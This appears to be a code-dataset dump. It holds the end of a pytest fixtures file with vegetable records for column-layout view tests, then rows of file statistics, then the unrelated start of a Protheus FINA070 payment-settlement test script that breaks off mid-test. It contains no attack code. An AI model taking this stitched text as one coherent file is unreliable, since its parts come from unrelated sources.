{"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
{"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
{"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
{"id": 8, "name": "Broccoli", "colour": "green", "count": 8, "herb": False},
{"id": 9, "name": "Brussels Sprouts", "colour": "green", "count": 16, "herb": False},
{"id": 10, "name": "Cabbage", "colour": "green", "count": 7, "herb": False},
],
[
{"id": 41, "name": "Sage", "colour": "green", "count": 4, "herb": True},
{"id": 29, "name": "Spinach", "colour": "green", "count": 7, "herb": False},
{"id": 30, "name": "Summer Squash", "colour": "yellow", "count": 12, "herb": False},
],
]
def padded_columns_16():
"""
Columns with 16 entries where some entries are blank to fill shorter columns to match the longest
Used in parametrized fixture "padded_columns"
"""
return [
[
{"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
{"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
{"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
{"id": 7, "name": "Beets", "colour": "red", "count": 5, "herb": False},
{"id": 24, "name": "Bell Peppers", "colour": "red", "count": 12, "herb": False},
{"id": 8, "name": "Broccoli", "colour": "green", "count": 8, "herb": False},
{"id": 9, "name": "Brussels Sprouts", "colour": "green", "count": 16, "herb": False},
{"id": 10, "name": "Cabbage", "colour": "green", "count": 7, "herb": False},
{"id": 21, "name": "Cantaloupe", "colour": "orange", "count": 10, "herb": False},
{"id": 4, "name": "Carrots", "colour": "orange", "count": 7, "herb": False},
{"id": 11, "name": "Cauliflower", "colour": "white", "count": 11, "herb": False},
{"id": 12, "name": "Celery", "colour": "green", "count": 6, "herb": False},
{"id": 31, "name": "Chard", "colour": "green", "count": 5, "herb": False},
{"id": 13, "name": "Chives", "colour": "green", "count": 6, "herb": True},
{"id": 38, "name": "Cilantro", "colour": "green", "count": 8, "herb": True},
{"id": 14, "name": "Collard Greens", "colour": "green", "count": 14, "herb": False},
],
[
{"id": 15, "name": "Cucumbers", "colour": "green", "count": 9, "herb": False},
{"id": 45, "name": "Dill", "colour": "green", "count": 4, "herb": True},
{"id": 17, "name": "Eggplant", "colour": "purple", "count": 8, "herb": False},
{"id": 48, "name": "Fred", "colour": "human", "count": 4, "herb": False},
{"id": 49, "name": "Fred the Son", "colour": "human", "count": 12, "herb": False},
{"id": 19, "name": "Garlic", "colour": "white", "count": 6, "herb": True},
{"id": 20, "name": "Kale", "colour": "green", "count": 4, "herb": False},
{"id": 3, "name": "Lettuce", "colour": "green", "count": 7, "herb": False},
{"id": 40, "name": "Mint", "colour": "green", "count": 4, "herb": True},
{"id": 43, "name": "Okra", "colour": "green", "count": 4, "herb": False},
{"id": 18, "name": "Onion", "colour": "white", "count": 5, "herb": False},
{"id": 36, "name": "Oregano", "colour": "green", "count": 7, "herb": True},
{"id": 39, "name": "Parsley", "colour": "green", "count": 7, "herb": True},
{"id": 22, "name": "Parsnips", "colour": "white", "count": 8, "herb": False},
{"id": 23, "name": "Peas", "colour": "green", "count": 4, "herb": False},
{"id": 25, "name": "Potatoes", "colour": "white", "count": 8, "herb": False},
],
[
{"id": 26, "name": "Pumpkins", "colour": "orange", "count": 8, "herb": False},
{"id": 27, "name": "Radishes", "colour": "red", "count": 8, "herb": False},
{"id": 28, "name": "Rhubarb", "colour": "red", "count": 7, "herb": False},
{"id": 37, "name": "Rosemary", "colour": "green", "count": 8, "herb": True},
{"id": 41, "name": "Sage", "colour": "green", "count": 4, "herb": True},
{"id": 29, "name": "Spinach", "colour": "green", "count": 7, "herb": False},
{"id": 30, "name": "Summer Squash", "colour": "yellow", "count": 12, "herb": False},
{"id": 16, "name": "Sweet Corn", "colour": "yellow", "count": 10, "herb": False},
{"id": 44, "name": "Sweet Potato", "colour": "orange", "count": 12, "herb": False},
{"id": 42, "name": "Tarragon", "colour": "green", "count": 8, "herb": True},
{"id": 35, "name": "Thyme", "colour": "green", "count": 5, "herb": True},
{"id": 1, "name": "Tomatoes", "colour": "red", "count": 8, "herb": False},
{"id": 32, "name": "Turnips", "colour": "white", "count": 7, "herb": False},
{"id": 33, "name": "Watermelon", "colour": "red", "count": 10, "herb": False},
{"id": 34, "name": "Winter Squash", "colour": "orange", "count": 13, "herb": False},
"",
],
]
def padded_columns_4():
"""
Columns with 4 entries where some entries are blank to fill shorter columns to match the longest
Used in parametrized fixture "padded_columns"
"""
return [
[
{"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
{"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
{"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
{"id": 7, "name": "Beets", "colour": "red", "count": 5, "herb": False},
],
[
{"id": 15, "name": "Cucumbers", "colour": "green", "count": 9, "herb": False},
{"id": 45, "name": "Dill", "colour": "green", "count": 4, "herb": True},
{"id": 17, "name": "Eggplant", "colour": "purple", "count": 8, "herb": False},
{"id": 48, "name": "Fred", "colour": "human", "count": 4, "herb": False},
],
[
{"id": 26, "name": "Pumpkins", "colour": "orange", "count": 8, "herb": False},
{"id": 27, "name": "Radishes", "colour": "red", "count": 8, "herb": False},
{"id": 28, "name": "Rhubarb", "colour": "red", "count": 7, "herb": False},
"",
],
]
@pytest.fixture(params=[(padded_columns_4(), 4, 3), (padded_columns_16(), 16, 3)])
def padded_columns(request):
"""Pytest parametrized fixture to return the listed fixtures"""
return request.param
@pytest.fixture()
def fixture_padded_columns_4():
"""Columns with 4 entries where some entries are blank to fill shorter columns to match the longest"""
return [
[
[
{"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
{"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
{"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
{"id": 7, "name": "Beets", "colour": "red", "count": 5, "herb": False},
],
[
{"id": 15, "name": "Cucumbers", "colour": "green", "count": 9, "herb": False},
{"id": 45, "name": "Dill", "colour": "green", "count": 4, "herb": True},
{"id": 17, "name": "Eggplant", "colour": "purple", "count": 8, "herb": False},
{"id": 48, "name": "Fred", "colour": "human", "count": 4, "herb": False},
],
[
{"id": 26, "name": "Pumpkins", "colour": "orange", "count": 8, "herb": False},
{"id": 27, "name": "Radishes", "colour": "red", "count": 8, "herb": False},
{"id": 28, "name": "Rhubarb", "colour": "red", "count": 7, "herb": False},
"",
],
],
4,
3,
]
@pytest.fixture()
def fixture_padded_columns_16():
"""Columns with 16 entries where some entries are blank to fill shorter columns to match the longest"""
return [
[
[
{"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
{"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
{"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
{"id": 7, "name": "Beets", "colour": "red", "count": 5, "herb": False},
{"id": 24, "name": "Bell Peppers", "colour": "red", "count": 12, "herb": False},
{"id": 8, "name": "Broccoli", "colour": "green", "count": 8, "herb": False},
{"id": 9, "name": "Brussels Sprouts", "colour": "green", "count": 16, "herb": False},
{"id": 10, "name": "Cabbage", "colour": "green", "count": 7, "herb": False},
{"id": 21, "name": "Cantaloupe", "colour": "orange", "count": 10, "herb": False},
{"id": 4, "name": "Carrots", "colour": "orange", "count": 7, "herb": False},
{"id": 11, "name": "Cauliflower", "colour": "white", "count": 11, "herb": False},
{"id": 12, "name": "Celery", "colour": "green", "count": 6, "herb": False},
{"id": 31, "name": "Chard", "colour": "green", "count": 5, "herb": False},
{"id": 13, "name": "Chives", "colour": "green", "count": 6, "herb": True},
{"id": 38, "name": "Cilantro", "colour": "green", "count": 8, "herb": True},
{"id": 14, "name": "Collard Greens", "colour": "green", "count": 14, "herb": False},
],
[
{"id": 15, "name": "Cucumbers", "colour": "green", "count": 9, "herb": False},
{"id": 45, "name": "Dill", "colour": "green", "count": 4, "herb": True},
{"id": 17, "name": "Eggplant", "colour": "purple", "count": 8, "herb": False},
{"id": 48, "name": "Fred", "colour": "human", "count": 4, "herb": False},
{"id": 49, "name": "Fred the Son", "colour": "human", "count": 12, "herb": False},
{"id": 19, "name": "Garlic", "colour": "white", "count": 6, "herb": True},
{"id": 20, "name": "Kale", "colour": "green", "count": 4, "herb": False},
{"id": 3, "name": "Lettuce", "colour": "green", "count": 7, "herb": False},
{"id": 40, "name": "Mint", "colour": "green", "count": 4, "herb": True},
{"id": 43, "name": "Okra", "colour": "green", "count": 4, "herb": False},
{"id": 18, "name": "Onion", "colour": "white", "count": 5, "herb": False},
{"id": 36, "name": "Oregano", "colour": "green", "count": 7, "herb": True},
{"id": 39, "name": "Parsley", "colour": "green", "count": 7, "herb": True},
{"id": 22, "name": "Parsnips", "colour": "white", "count": 8, "herb": False},
{"id": 23, "name": "Peas", "colour": "green", "count": 4, "herb": False},
{"id": 25, "name": "Potatoes", "colour": "white", "count": 8, "herb": False},
],
[
{"id": 26, "name": "Pumpkins", "colour": "orange", "count": 8, "herb": False},
{"id": 27, "name": "Radishes", "colour": "red", "count": 8, "herb": False},
{"id": 28, "name": "Rhubarb", "colour": "red", "count": 7, "herb": False},
{"id": 37, "name": "Rosemary", "colour": "green", "count": 8, "herb": True},
{"id": 41, "name": "Sage", "colour": "green", "count": 4, "herb": True},
{"id": 29, "name": "Spinach", "colour": "green", "count": 7, "herb": False},
{"id": 30, "name": "Summer Squash", "colour": "yellow", "count": 12, "herb": False},
{"id": 16, "name": "Sweet Corn", "colour": "yellow", "count": 10, "herb": False},
{"id": 44, "name": "Sweet Potato", "colour": "orange", "count": 12, "herb": False},
{"id": 42, "name": "Tarragon", "colour": "green", "count": 8, "herb": True},
{"id": 35, "name": "Thyme", "colour": "green", "count": 5, "herb": True},
{"id": 1, "name": "Tomatoes", "colour": "red", "count": 8, "herb": False},
{"id": 32, "name": "Turnips", "colour": "white", "count": 7, "herb": False},
{"id": 33, "name": "Watermelon", "colour": "red", "count": 10, "herb": False},
{"id": 34, "name": "Winter Squash", "colour": "orange", "count": 13, "herb": False},
"",
],
],
16,
3,
]
@pytest.fixture()
def columns_many():
"""Simulating many columns being returned with varying numbers of entries in each"""
def _build_cols(num_items, num_cols):
col = [{} for i in range(num_items - random.randint(0, num_items))]
cols = [col for i in range(num_cols)]
# adding one more line to ensure there is at least one line with the full num_items in it
cols.append([{} for i in range(num_items)])
return cols
return _build_cols
@pytest.fixture()
def columns_same_length_4():
"""Columns are all the same length ... test will demonstrate they stay that way"""
return [
[
{"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
{"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
{"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
{"id": 7, "name": "Beets", "colour": "red", "count": 5, "herb": False},
],
[
{"id": 15, "name": "Cucumbers", "colour": "green", "count": 9, "herb": False},
{"id": 45, "name": "Dill", "colour": "green", "count": 4, "herb": True},
{"id": 17, "name": "Eggplant", "colour": "purple", "count": 8, "herb": False},
{"id": 48, "name": "Fred", "colour": "human", "count": 4, "herb": False},
],
[
{"id": 26, "name": "Pumpkins", "colour": "orange", "count": 8, "herb": False},
{"id": 27, "name": "Radishes", "colour": "red", "count": 8, "herb": False},
{"id": 28, "name": "Rhubarb", "colour": "red", "count": 7, "herb": False},
{"id": 35, "name": "Thyme", "colour": "green", "count": 5, "herb": True},
],
]
@pytest.fixture()
def first_column_empty_5():
"""First column is empty ... test will demonstrate this edge case can be handled"""
return [
[],
[
{"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
{"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
{"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
{"id": 7, "name": "Beets", "colour": "red", "count": 5, "herb": False},
{"id": 24, "name": "Bell Peppers", "colour": "red", "count": 12, "herb": False},
],
[
{"id": 8, "name": "Broccoli", "colour": "green", "count": 8, "herb": False},
{"id": 15, "name": "Cucumbers", "colour": "green", "count": 9, "herb": False},
{"id": 45, "name": "Dill", "colour": "green", "count": 4, "herb": True},
{"id": 17, "name": "Eggplant", "colour": "purple", "count": 8, "herb": False},
{"id": 1, "name": "Tomatoes", "colour": "red", "count": 8, "herb": False},
],
]
@pytest.fixture()
def last_column_empty_2():
"""Last column is empty ... test will demoonstrate this edge case can be handled"""
return [
[{"id": 5, "name": "Asparagus"}, {"id": 2, "name": "Basil"}],
[{"id": 15, "name": "Cucumbers"}, {"id": 45, "name": "Dill"}],
[{"id": 22, "name": "Parsnips"}, {"id": 23, "name": "Peas"}],
[],
]
@pytest.fixture()
def all_columns_empty():
"""All columns are empty ... test will demoonstrate this edge case can be handled"""
return [[] for i in range(0, 100)]
# Fixtures for specifically testing CriteriaVMCView
@pytest.fixture()
def criteria_functions_2():
"""2 functions are passed to a VMCCriteria view"""
def a_to_m(args):
parms = args
return "ABCDEFGHIJKLM".find(parms[0][0]) > -1
def n_to_z(args):
parms = args
return "NOPQRSTUVWXYZ".find(parms[0][0]) > -1
return [a_to_m, n_to_z]
@pytest.fixture()
def criteria_functions_3():
"""3 functions are passed to a VMCCriteria view"""
def a_to_m_and_count_less_than_10(args):
"""Items matching this condition go in column 1"""
entry_keys = args
return "ABCDEFGHIJKLM".find(entry_keys[0][0]) > -1 and entry_keys[1] < 10
def n_to_z_and_count_10_or_greater(args):
"""Items matching this condition go in column 2"""
entry_keys = args
return "NOPQRSTUVWXYZ".find(entry_keys[0][0]) > -1 and entry_keys[1] >= 10
def is_herb(args):
"""Items matching this condition go in column 3"""
entry_keys = args
return entry_keys[2] is True
return [a_to_m_and_count_less_than_10, n_to_z_and_count_10_or_greater, is_herb]
@pytest.fixture()
def criteria_functions_4():
"""4 functions are passed to a VMCCriteria view"""
def a_to_d(args):
parms = args
return "ABCD".find(parms[0][0]) > -1
def e_to_m(args):
parms = args
return "EFGHIJKLM".find(parms[0][0]) > -1
def n_to_r(args):
parms = args
return "NOPQR".find(parms[0][0]) > -1
def s_to_z(args):
parms = args
return "STUVWXYZ".find(parms[0][0]) > -1
return [a_to_d, e_to_m, n_to_r, s_to_z]
@pytest.fixture()
def criteria_functions_5():
"""5 functions are passed to a VMCCriteria view"""
def a_to_d(args):
parms = args
return "ABCD".find(parms[0][0]) > -1
def e_to_m(args):
parms = args
return "EFGHIJKLM".find(parms[0][0]) > -1
def n_to_r(args):
parms = args
return "NOPQR".find(parms[0][0]) > -1
def s_to_u(args):
parms = args
return "STU".find(parms[0][0]) > -1
def v_to_z(args):
parms = args
return "VWXYZ".find(parms[0][0]) > -1
return [a_to_d, e_to_m, n_to_r, s_to_u, v_to_z]
@pytest.fixture()
def function_args_2():
"""dictionary keys are passed"""
return ["name"]
@pytest.fixture()
def function_args_3():
"""dictionary keys are passed"""
return ["name", "count", "herb"]
@pytest.fixture()
def function_args_4():
"""dictionary keys are passed"""
return ["name"]
@pytest.fixture()
def function_args_5():
"""dictionary keys are passed"""
return ["name"]
# Fixtures specifically for testing get_queryset - common in - specific out by VMC class
@pytest.fixture()
def test_in_even_criteria_data():
"""Input data for ListView's get_queryset() override in EvenVMCView and CriteriaVMCView tests"""
return [
{"id": 5, "name": "Asparagus"},
{"id": 2, "name": "Basil"},
{"id": 6, "name": "Beans"},
{"id": 7, "name": "Beets"},
{"id": 24, "name": "Bell Peppers"},
{"id": 8, "name": "Broccoli"},
{"id": 9, "name": "Brussels Sprouts"},
{"id": 10, "name": "Cabbage"},
{"id": 21, "name": "Cantaloupe"},
{"id": 4, "name": "Carrots"},
{"id": 11, "name": "Cauliflower"},
{"id": 12, "name": "Celery"},
{"id": 31, "name": "Chard"},
{"id": 13, "name": "Chives"},
{"id": 38, "name": "Cilantro"},
{"id": 14, "name": "Collard Greens"},
{"id": 15, "name": "Cucumbers"},
{"id": 45, "name": "Dill"},
{"id": 17, "name": "Eggplant"},
{"id": 19, "name": "Garlic"},
{"id": 20, "name": "Kale"},
{"id": 3, "name": "Lettuce"},
{"id": 40, "name": "Mint"},
{"id": 43, "name": "Okra"},
{"id": 18, "name": "Onion"},
{"id": 36, "name": "Oregano"},
{"id": 39, "name": "Parsley"},
{"id": 22, "name": "Parsnips"},
{"id": 23, "name": "Peas"},
{"id": 25, "name": "Potatoes"},
{"id": 26, "name": "Pumpkins"},
{"id": 27, "name": "Radishes"},
{"id": 28, "name": "Rhubarb"},
{"id": 37, "name": "Rosemary"},
{"id": 41, "name": "Sage"},
{"id": 29, "name": "Spinach"},
{"id": 30, "name": "Summer Squash"},
{"id": 16, "name": "Sweet Corn"},
{"id": 44, "name": "Sweet Potato"},
{"id": 42, "name": "Tarragon"},
{"id": 35, "name": "Thyme"},
{"id": 1, "name": "Tomatoes"},
{"id": 32, "name": "Turnips"},
{"id": 33, "name": "Watermelon"},
{"id": 34, "name": "Winter Squash"},
]
@pytest.fixture()
def test_out_even_data():
""""Out data for the override of ListView's get_queryset() in EvenVMCView"""
return [
[
{"id": 5, "name": "Asparagus"},
{"id": 14, "name": "Collard Greens"},
{"id": 26, "name": "Pumpkins"},
],
[
{"id": 2, "name": "Basil"},
{"id": 15, "name": "Cucumbers"},
{"id": 27, "name": "Radishes"},
],
[
{"id": 6, "name": "Beans"},
{"id": 45, "name": "Dill"},
{"id": 28, "name": "Rhubarb"},
],
[
{"id": 7, "name": "Beets"},
{"id": 17, "name": "Eggplant"},
{"id": 37, "name": "Rosemary"},
],
[
{"id": 24, "name": "Bell Peppers"},
{"id": 19, "name": "Garlic"},
{"id": 41, "name": "Sage"},
],
[
{"id": 8, "name": "Broccoli"},
{"id": 20, "name": "Kale"},
{"id": 29, "name": "Spinach"},
],
[
{"id": 9, "name": "Brussels Sprouts"},
{"id": 3, "name": "Lettuce"},
{"id": 30, "name": "Summer Squash"},
],
[
{"id": 10, "name": "Cabbage"},
{"id": 40, "name": "Mint"},
{"id": 16, "name": "Sweet Corn"},
],
[
{"id": 21, "name": "Cantaloupe"},
{"id": 43, "name": "Okra"},
{"id": 44, "name": "Sweet Potato"},
],
[
{"id": 4, "name": "Carrots"},
{"id": 18, "name": "Onion"},
{"id": 42, "name": "Tarragon"},
],
[
{"id": 11, "name": "Cauliflower"},
{"id": 36, "name": "Oregano"},
{"id": 35, "name": "Thyme"},
],
[
{"id": 12, "name": "Celery"},
{"id": 39, "name": "Parsley"},
{"id": 1, "name": "Tomatoes"},
],
[
{"id": 31, "name": "Chard"},
{"id": 22, "name": "Parsnips"},
{"id": 32, "name": "Turnips"},
],
[
{"id": 13, "name": "Chives"},
{"id": 23, "name": "Peas"},
{"id": 33, "name": "Watermelon"},
],
[
{"id": 38, "name": "Cilantro"},
{"id": 25, "name": "Potatoes"},
{"id": 34, "name": "Winter Squash"},
],
]
@pytest.fixture()
def test_out_criteria_data():
""""Out data for the override of ListView's get_queryset() in CriteriaVMCView"""
return [
[
{"id": 5, "name": "Asparagus"},
{"id": 19, "name": "Garlic"},
{"id": 42, "name": "Tarragon"},
],
[
{"id": 2, "name": "Basil"},
{"id": 20, "name": "Kale"},
{"id": 35, "name": "Thyme"},
],
[
{"id": 6, "name": "Beans"},
{"id": 3, "name": "Lettuce"},
{"id": 1, "name": "Tomatoes"},
],
[
{"id": 7, "name": "Beets"},
{"id": 40, "name": "Mint"},
{"id": 32, "name": "Turnips"},
],
[
{"id": 24, "name": "Bell Peppers"},
{"id": 43, "name": "Okra"},
{"id": 33, "name": "Watermelon"},
],
[
{"id": 8, "name": "Broccoli"},
{"id": 18, "name": "Onion"},
{"id": 34, "name": "Winter Squash"},
],
[{"id": 9, "name": "Brussels Sprouts"}, {"id": 36, "name": "Oregano"}, ""],
[{"id": 10, "name": "Cabbage"}, {"id": 39, "name": "Parsley"}, ""],
[{"id": 21, "name": "Cantaloupe"}, {"id": 22, "name": "Parsnips"}, ""],
[{"id": 4, "name": "Carrots"}, {"id": 23, "name": "Peas"}, ""],
[{"id": 11, "name": "Cauliflower"}, {"id": 25, "name": "Potatoes"}, ""],
[{"id": 12, "name": "Celery"}, {"id": 26, "name": "Pumpkins"}, ""],
[{"id": 31, "name": "Chard"}, {"id": 27, "name": "Radishes"}, ""],
[{"id": 13, "name": "Chives"}, {"id": 28, "name": "Rhubarb"}, ""],
[{"id": 38, "name": "Cilantro"}, {"id": 37, "name": "Rosemary"}, ""],
[{"id": 14, "name": "Collard Greens"}, {"id": 41, "name": "Sage"}, ""],
[{"id": 15, "name": "Cucumbers"}, {"id": 29, "name": "Spinach"}, ""],
[{"id": 45, "name": "Dill"}, {"id": 30, "name": "Summer Squash"}, ""],
[{"id": 17, "name": "Eggplant"}, {"id": 16, "name": "Sweet Corn"}, ""],
["", {"id": 44, "name": "Sweet Potato"}, ""],
]
@pytest.fixture()
def test_in_defined_data():
""""Input data for ListView's get_queryset() override in DefinedVMCView tests"""
return [
[
{"id": 5, "name": "Asparagus"},
{"id": 2, "name": "Basil"},
{"id": 6, "name": "Beans"},
{"id": 7, "name": "Beets"},
{"id": 24, "name": "Bell Peppers"},
{"id": 8, "name": "Broccoli"},
{"id": 9, "name": "Brussels Sprouts"},
{"id": 10, "name": "Cabbage"},
{"id": 21, "name": "Cantaloupe"},
],
[{"id": 19, "name": "Garlic"}],
[
{"id": 20, "name": "Kale"},
{"id": 3, "name": "Lettuce"},
{"id": 40, "name": "Mint"},
{"id": 43, "name": "Okra"},
{"id": 18, "name": "Onion"},
{"id": 36, "name": "Oregano"},
{"id": 39, "name": "Parsley"},
],
[
{"id": 42, "name": "Tarragon"},
{"id": 35, "name": "Thyme"},
{"id": 1, "name": "Tomatoes"},
{"id": 32, "name": "Turnips"},
{"id": 33, "name": "Watermelon"},
{"id": 34, "name": "Winter Squash"},
],
]
@pytest.fixture()
def test_out_defined_data():
""""Out data for the override of ListView's get_queryset() in EvenVMCView"""
return [
[
{"id": 5, "name": "Asparagus"},
{"id": 19, "name": "Garlic"},
{"id": 20, "name": "Kale"},
{"id": 42, "name": "Tarragon"},
],
[
{"id": 2, "name": "Basil"},
"",
{"id": 3, "name": "Lettuce"},
{"id": 35, "name": "Thyme"},
],
[
{"id": 6, "name": "Beans"},
"",
{"id": 40, "name": "Mint"},
{"id": 1, "name": "Tomatoes"},
],
[
{"id": 7, "name": "Beets"},
"",
{"id": 43, "name": "Okra"},
{"id": 32, "name": "Turnips"},
],
[
{"id": 24, "name": "Bell Peppers"},
"",
{"id": 18, "name": "Onion"},
{"id": 33, "name": "Watermelon"},
],
[
{"id": 8, "name": "Broccoli"},
"",
{"id": 36, "name": "Oregano"},
{"id": 34, "name": "Winter Squash"},
],
[{"id": 9, "name": "Brussels Sprouts"}, "", {"id": 39, "name": "Parsley"}, ""],
[{"id": 10, "name": "Cabbage"}, "", "", ""],
[{"id": 21, "name": "Cantaloupe"}, "", "", ""],
]
@pytest.fixture()
def json_data_structure_with_all_data_types():
"""
This JSON contains all the JSON data types: string, number, boolean, null/empty, object, and array.
It was generated by calling requests and converting to Python format using .JSON method provided by requests.
"""
return [
{
"id": 1,
"title": "hello",
"count": 35,
"boolean": True,
"empty": None,
"object": {"a": "susan", "b": 3},
"array": [1, 2, 3],
},
{
"id": 2,
"title": "goodbye",
"count": 42,
"boolean": False,
"empty": None,
"object": {"a": "peter", "b": 32},
"array": [11, 12, 13],
},
{
"id": 3,
"title": "adieu",
"count": 22,
"boolean": True,
"empty": None,
"object": {"a": "indy", "b": 90},
"array": [111, 112, 113],
},
]
@pytest.fixture()
def heirarchical_data_structure():
"""Heirarchical JSON data"""
return [
{
"squadName": "Super hero squad",
"homeTown": "Metro City",
"formed": 2016,
"secretBase": "Super tower",
"active": True,
"members": [
{
"name": "Molecule Man",
"age": 29,
"secretIdentity": "Dan Jukes",
"powers": [
"Radiation resistance",
"Turning tiny",
"Radiation blast",
],
},
{
"name": "Madame Uppercut",
"age": 39,
"secretIdentity": "Jane Wilson",
"powers": [
"Million tonne punch",
"Damage resistance",
"Superhuman reflexes",
],
},
{
"name": "Eternal Flame",
"age": 1000000,
"secretIdentity": "Unknown",
"powers": [
"Immortality",
"Heat Immunity",
"Inferno",
"Teleportation",
"Interdimensional travel",
],
},
],
},
{
"squadName": "Super hero squad2",
"homeTown": "Toronto",
"formed": 2020,
"secretBase": "Super tower",
"active": False,
"members": [
{
"name": "Molecule Man",
"age": 29,
"secretIdentity": "Dan Jukes",
"powers": [
"Radiation resistance",
"Turning tiny",
"Radiation blast",
],
},
{
"name": "Madame Uppercut",
"age": 39,
"secretIdentity": "Jane Wilson",
"powers": [
"Million tonne punch",
"Damage resistance",
"Superhuman reflexes",
],
},
{
"name": "Eternal Flame",
"age": 1000000,
"secretIdentity": "Unknown",
"powers": [
"Immortality",
"Heat Immunity",
"Inferno",
"Teleportation",
"Interdimensional travel",
],
},
],
},
]
| 40.793066
| 113
| 0.449511
| 4,004
| 37,652
| 4.17033
| 0.088412
| 0.077075
| 0.088274
| 0.029644
| 0.8722
| 0.787819
| 0.757875
| 0.721284
| 0.700922
| 0.680501
| 0
| 0.041762
| 0.31507
| 37,652
| 922
| 114
| 40.83731
| 0.605723
| 0.076118
| 0
| 0.711313
| 0
| 0
| 0.291932
| 0.000637
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06632
| false
| 0
| 0.003901
| 0
| 0.128739
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6ce128d464a04346095d432e7af7a1e6926893e1
| 36,733
|
py
|
Python
|
Protheus_WebApp/Modules/SIGAFIN/FINA070TESTCASE.py
|
98llm/tir-script-samples
|
0bff8393b79356aa562e9e6512c11ee6e039b177
|
[
"MIT"
] | 17
|
2018-09-24T17:27:08.000Z
|
2021-09-16T19:09:46.000Z
|
Protheus_WebApp/Modules/SIGAFIN/FINA070TESTCASE.py
|
98llm/tir-script-samples
|
0bff8393b79356aa562e9e6512c11ee6e039b177
|
[
"MIT"
] | 4
|
2018-09-24T17:30:32.000Z
|
2022-01-03T11:39:30.000Z
|
Protheus_WebApp/Modules/SIGAFIN/FINA070TESTCASE.py
|
98llm/tir-script-samples
|
0bff8393b79356aa562e9e6512c11ee6e039b177
|
[
"MIT"
] | 18
|
2019-06-07T17:41:34.000Z
|
2022-01-31T18:17:31.000Z
|
import unittest
import time
from tir import Webapp
from datetime import datetime
DateSystem = datetime.today().strftime('%d/%m/%Y')
class FINA070(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup("SIGAFIN", DateSystem, "T1", "D MG 01 ", "06")
inst.oHelper.Program("FINA070")
### CT190
### Baixar título.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T40989
def test_FINA070_CT190(self):
prefixo = "FIN"
titulo = "A070TIR01"
parcela = "A"
tipo = "NF "
banco = "001"
agencia = "001"
conta = "001"
data = "30/05/2019"
self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Banco", banco)
self.oHelper.SetValue("Agência", agencia)
self.oHelper.SetValue("Conta", conta)
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.SetValue("= Valor Recebido", "3000,00")
self.oHelper.CheckResult("- Pis", "19,50")
self.oHelper.CheckResult("- Cofins", "90,00")
self.oHelper.CheckResult("- Csll", "30,00")
self.oHelper.SetButton("Salvar")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.CheckResult("- Pagtos Parciais", "3000,00")
self.oHelper.CheckResult("- Pis", "6,50")
self.oHelper.CheckResult("- Cofins", "30,00")
self.oHelper.CheckResult("- Csll", "10,00")
self.oHelper.CheckResult("= Valor Recebido", "814,00")
self.oHelper.SetButton("Cancelar")
self.oHelper.AssertTrue()
### CT191
### Cancelar baixa.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T40991
def test_FINA070_CT191(self):
prefixo = "FIN"
titulo = "A070TIR01"
parcela = "B"
tipo = "NF "
# O parâmetro está sendo configurado no CT190
# self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
# #self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Outras Ações", "Canc Baixa")
self.oHelper.SetButton("Confirmar")
self.oHelper.CheckHelp(text='TOTVS',button='Sim')
# verifica se foi cancelado
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.CheckResult("- Pagtos Parciais", "0,00")
self.oHelper.CheckResult("- Pis", "26,00")
self.oHelper.CheckResult("- Cofins", "120,00")
self.oHelper.CheckResult("- Csll", "40,00")
self.oHelper.CheckResult("= Valor Recebido", "3814,00")
self.oHelper.SetButton("Cancelar")
self.oHelper.AssertTrue()
### CT192
### Excluir baixa.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/testCase/GTSER-T40992
def test_FINA070_CT192(self):
prefixo = "FIN"
titulo = "A070TIR01"
parcela = "C"
tipo = "NF "
# O parâmetro está sendo configurado no CT190
# self.oHelper.AddParameter("MV_BR10925", "", "1", "1", "1")
